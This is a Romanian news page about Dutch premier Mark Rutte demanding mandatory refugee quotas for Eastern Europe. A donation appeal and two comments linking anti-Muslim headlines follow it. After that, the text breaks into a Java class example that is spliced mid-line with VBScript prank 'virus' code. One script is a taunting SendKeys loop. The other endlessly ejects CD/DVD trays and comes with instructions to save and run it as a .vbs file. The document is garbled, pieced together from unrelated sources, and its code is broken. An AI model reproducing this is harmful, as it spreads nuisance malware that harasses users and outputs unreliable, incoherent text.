Premierul Olandei, Mark Rutte, cere stabilirea unor cote obligatorii pentru distribuirea refugiaţilor, afirmând că statele central şi est-europene care se opun propunerii au beneficiat de fonduri importante din partea UE, astfel că acum trebuie să asume responsabilităţi.
„Uniunea Europeană trebuie să ajungă la un acord privind distribuirea obligatorie a refugiaţilor. Preluarea imigranţilor nu poate fi făcută doar de un număr limitat de ţări; trebuie să se pună capăt comerţului cu drepturile de azil, cu faptul că imigranţii merg doar în ţările mai prospere”, a declarat Rutte.
„Este necesar un sistem obligatoriu de distribuire”, a adăugat Mark Rutte.
„Europa de Est s-a putut baza, în ultimii zece ani, pe o contribuţie importantă din partea Europei; acum trebuie să preia responsabilităţi. Fonduri importante au fost investite în economiile din Europa de Est; a fost şi în interesul nostru; acum Europa de Vest are nevoie reală de Europa de Est”, a insistat Rutte.
În urmă cu câteva ore, ministrul german de Externe, Frank-Walter Steinmeier, a avertizat ţările central şi est-europene care se opun cotelor obligatorii în materie de imigraţie că ar putea fi depăşite în Consiliul UE dacă se va aplica sistemul majorităţii calificate. „Nu se poate ca doar Germania, Austria, Suedia şi Italia să suporte singure problema imigranţilor. Nu aşa funcţionează solidaritatea”, a declarat Steinmeier.
Susțineți NapocaNews.ro
Într-o lume care cenzurează site-urile de editoriale și știri alternative ca NapocaNews.ro, vă rog să ne sprijiniți financiar printr-o donație pentru informații adevărate și pe românește.
Puteți face o donație prin transfer bancar:
Fundația Culturală Sarmisegetuza - Cluj
(proprietar NapocaNews.ro)
Cont IBAN: RO85BRDE130SV27532721300
👉 Preferi să donezi rapid online?
Poți sprijini NapocaNews.ro imediat folosind PayPal:


2 comentarii la “Premierul Olandei: Ţările est-europene trebuie să accepte cote de imigranți, au primit fonduri UE”
– Aici e țara cruciaților, nu a bașbuzucilor!
http://bit.ly/1W8EiWz
– PLANURILE Turciei în România și Ungaria: Moschee la București, cel mai MARE centru islamic din Europa Centrală, la Budapesta
http://bit.ly/1V0bMUM
class ProgrammingLanguage {
//attributes
String language_name;
String language_type;
//constructor
ProgrammingLanguage(String n, String t) {
language_name = n;
language_type = t;
}
//main method
public static void main(String[] args) {
//creating objects of class
ProgrammingLanguage C = new ProgrammingLanguage(„C”, „Procedural”);
ProgrammingLanguage Cpp = new ProgrammingLanguage(„C++”, „Object oriented”);
//calling method
C.display();
Cpp.display();
}
//method (function in C++ programming)
void display() {
System.out.println(„Language name:”+language_name);WshShell.SendKeys ” {enter}”
WScript.Sleep 200
WshShell.SendKeys “hahahahaha…….”
WScript.Sleep 200
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “look”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “how”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 100
wshshell.sendkeys “i”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “crash”
wscript.sleep 200
wshshell.sendkeys ” uR”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “system”
wscript.sleep 200
loop
**************************************************
9. PoP-uP CD/DvD Dr!Ve V!rUs
Effect –> Low, but very irritating. Not Harmless.
Coding Platform –> VBscript.
Working –> On Executing, It will continously pop-up uR CD/DVD. It is very irritating and can be stopped only on system shut-down. It is not harmless or destructive.
Just copy the code or type it on notepad and save it as anyname with “.vbs” extension.
**************************************************
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
System.out.println(„Language type:”